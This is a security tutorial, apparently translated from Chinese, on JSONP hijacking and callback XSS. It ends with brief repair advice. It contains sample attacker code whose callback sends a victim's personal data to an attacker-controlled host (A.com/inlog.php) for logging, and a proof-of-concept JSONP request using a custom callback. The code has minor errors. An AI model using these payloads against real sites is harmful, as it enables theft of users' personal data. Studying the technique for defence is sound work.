table of Contents
description
Jsonp (JSON with Padding) is a "use mode" of json, which allows web pages to obtain data from other domains (websites), that is, cross-domain reading of data.
Why do we need a special technology (JSONP) to access data from different domains (websites)? This is because of the same-origin policy.
The same-origin policy, it is a well-known security policy proposed by Netscape, and now all browsers that support JavaScript will use this policy.
The callback value passed in will be returned directly in the result. Therefore, if the parameter filtering is not strict. You can enter whatever you want: the callback value is: alert('1'); parseResponse string. The result will print an alert window, and then it will execute normally.
In fact, it is caused by the lax inspection of the source of the JSONP request on the server side;
The attacker simulates the user to send a JSONP request to the vulnerable server, and then obtains some information of the user, and then sends the information to the server controlled by the attacker
principle
The most basic principle of JSONP is: dynamically add a <script> tag, and the src attribute of the script tag has no cross-domain restrictions. Due to the limitation of the same-origin policy, XmlHttpRequest only allows to request resources from the current source (domain name, protocol, and port are the same). If we want to make a cross-domain request, we can use the html script tag to make a cross-domain request, and in the response Return the script code to be executed, which can directly use JSON to pass the javascript object.
Consider a situation where there are two websites A and B. The user registers on website B and fills in his user name, mobile phone number, ID number and other information, and website B has a jsonp interface, and the user is visiting website B when. This jsonp interface will return the user's personal information and display it on the html page of website B. If website B has a loophole in the source verification of this jsonp interface, when a user visits website A, website A can use this loophole to perform JSONP hijacking to obtain user information.
The specific utilization process is as follows:
1. The user registers an account on website B, fills in his mobile phone number, name, ID and other personal information, and keeps logged in
2. The user sends a URL request to website A through the same browser. Website A may be a page that users often log in, or a page of a large manufacturer that is maliciously hijacked.
3. There is a malicious jsonp callback function and <script> tag on the A page of the website. The sample code is as follows:
<script type="text/javascript">
function callback(result)
{
var logUrl="http://A.com/inlog.php?"+'result='+result;
$.ajax({
url:Logurl,
type:"GET",
cache:false,});
}
</script>
<script type="text/javascript" src="http://B.com/userinfo.php?">4. There is an inlog.php in website A. When the callback function is triggered, a request will be sent to inlog.php, and inlog.php will record the request in the log.txt file.
5. After the user makes a request to website A, the malicious code in website A will send a jsonp request to website B and receive the data returned by website B
6. After the browser receives the data returned by website B, it will call the callback function of the website A page and save the user's registered information on website B to log.txt
flow chart
surroundings
Actual business environment
Common keywords are as follows:
POC
<script>
function calmness(a){
alert(a);
alert(/xss/)
}
</script>
<script src="http://IP:9081/api/v0/sqjr/resident/service/BannerInfo.queryRecommendList.json?province=%E6%B5%99%E6%B1%9F%E7%9C%81&city=%E6%9D%AD%E5%B7%9E%E5%B8%82&jsoncallback=calmness"></script>
process
First, find the address where the vulnerability exists
Modify the request package information, visible in the beginning of the return valuecalmness;
The calmness passed in is the function name, and the server returns a function call, which can be understood as: evil is a function, (["customername1","customername2"]) is the function parameter, the front end of the website only needs to write code processing function The returned value is fine.
carry on
If we modify the value of jsoncallback to other values, the return value here will also change accordingly. We can hijack jsoncallback parameters and construct our own jsoncallback processing function. After the victim clicks on our forged link, initiate a request to the jsonp interface. The processing method of the requested data is processed by our own jsoncallback processing function, which can achieve the purpose of hijacking
Write POC or carry out gold panning
Of course, there are also csrf attacks that bypass the token protection; bypass the Referer header, etc.;
Repair suggestions
The correct http header output of json avoids cross-domain data transmission as much as possible. For data transmission in the same domain, xmlhttp is used as the method of data acquisition, which depends on the security of javascript in the browser domain to protect data. If it is a cross-domain data transmission, authorization must be authenticated for sensitive data acquisition.
